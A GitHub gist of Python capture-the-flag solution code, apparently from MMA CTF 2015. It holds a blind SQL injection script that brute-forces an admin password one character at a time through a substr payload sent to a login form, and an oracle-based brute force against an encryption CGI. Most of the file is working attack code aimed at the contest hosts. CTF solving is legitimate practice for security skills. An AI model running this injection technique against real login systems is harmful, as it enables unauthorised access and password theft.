Created
September 6, 2015 23:52
-
-
Save shunkp/8ac4d311dfd12d96d7d5 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from urllib.request import * | |
from urllib.parse import * | |
import string | |
# check admin password via sql injection + substr | |
# return True if we are able to login (ie. character is a match), False otherwise | |
def challenge2(bURL, pos, char): | |
headers = {} | |
headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0' | |
headers['Accept-Language'] = 'en-GB,en;q=0.5' | |
values = {'username': 'admin\' and substr(password, {0}, 1) = \'{1}\'; - --'.format(pos,char)} | |
data = urlencode(values).encode('utf-8') | |
req = Request(bURL, data=data, headers=headers) | |
resp = urlopen(req) | |
data = resp.read().decode('utf-8') | |
if len(data) <= 36: | |
return True | |
else: | |
return False | |
def admin(): | |
start = "MMA{" | |
pos = len(start)+1 | |
flag = False | |
print('Starting string: {0}'.format(start)) | |
while flag == False: | |
# can also use string.printable or add more symbols but this seems to be ok | |
for c in string.ascii_lowercase + string.ascii_uppercase + '0123456789_}': | |
resp = challenge2("http://arrive.chal.mmactf.link/login.cgi", pos,c) | |
if resp == True: | |
start += c | |
pos += 1 | |
print('Letter found: {0}\nString: {1}\n'.format(c, start)) | |
break | |
def challenge(bURL, text): | |
headers = {} | |
headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0' | |
headers['Accept-Language'] = 'en-GB,en;q=0.5' | |
values = {'s': text.encode('utf-8'), '.submit': 'æå·å'} | |
data = urlencode(values).encode('utf-8') | |
req = Request(bURL, data=data, headers=headers) | |
resp = urlopen(req) | |
data = resp.read().decode('utf-8') | |
try: | |
sdata = data.split("</h1>")[1].split("<")[0][:-1] | |
except: | |
print(data) | |
return sdata | |
def scs3(match, prefix=""): | |
printable = string.ascii_lowercase + '0123456789}' | |
smatch = match.split(" ") | |
resp = challenge("http://bow.chal.mmactf.link/~scs/crypt6.cgi", prefix) | |
print("Starting string: {0}".format(prefix)) | |
i = 0 | |
while i < len(printable): | |
resp = challenge("http://bow.chal.mmactf.link/~scs/crypt6.cgi", prefix + printable[i]) | |
if match != resp: | |
sresp = resp.split(" ") | |
try: | |
for x in range(2,len(smatch)): | |
if smatch[x] != sresp[x]: | |
i += 1 | |
break | |
except IndexError: | |
prefix += printable[i] | |
print("New character found {0}\nString: {1}\n".format(printable[i],prefix)) | |
i = 0 | |
else: | |
print("Match found: {0}\n".format(prefix + printable[i])) | |
break | |
if __name__ == "__main__": | |
#scs3("60 00 0c 3a 1e 52 02 53 02 51 0c 5d 56 51 5a 5f 5f 5a 51 00 05 53 56 0a 5e 00 52 05 03 51 50 55 03 04 52 04 0f 0f 54 52 57 03 52 04 4e","MMA{e7") | |
admin() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment